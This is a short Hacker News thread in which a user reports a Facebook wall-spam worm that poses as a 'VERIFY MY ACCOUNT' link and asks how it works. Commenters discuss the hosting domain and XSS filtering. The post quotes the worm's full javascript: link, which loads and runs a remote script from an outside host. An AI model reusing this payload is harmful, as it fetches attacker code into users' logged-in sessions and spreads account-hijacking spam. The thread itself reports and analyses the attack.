Facebook's ==VERIFY MY ACCOUNT== virus

9 points by ricefield ↗ HN
So I don't know much about security, and I don't know how widespread this is, but right now, I'm getting a bunch of friends posting to my wall something along the lines of:

Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process...

And surprisingly, there is a link, right next to Like and Comment that says == VERIFY MY ACCOUNT == ...very authentic looking.

the "verify my account" link executes this bit of javascript: <a href="javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();">==VERIFY MY ACCOUNT==</a>

which as you can see, executes this script: http://pelorak.info/verify.js

I don't know much about how this works, but is there anyone who can shed light on how this works and why it works?

3 comments

[ 4.3 ms ] story [ 14.5 ms ] thread
We are really surprised Facebook hasn't been hit with before, how do they allow running remote JavaScript execution. This should be easy to detect. Here is the JavaScript that is executed: http://plucketenhe.info/verify.js

The domain (plucketenhe.info) resolves to: 173.239.26.21, and whois on that IP: http://www.ip-adress.com/whois/173.239.26.21

so in other words, facebook is kind of dumb for allowing remote javascript execution...
Well, it can be tricky, often times the XSS attack is masked quite deeply, but there are known methods. PHP strip_tags will assist, though would need to be beefed up a bit to handle the onclick, onhover, onblur, onfocus, etc events. In this particular case, simply looking for `javascript:` would have done the trick.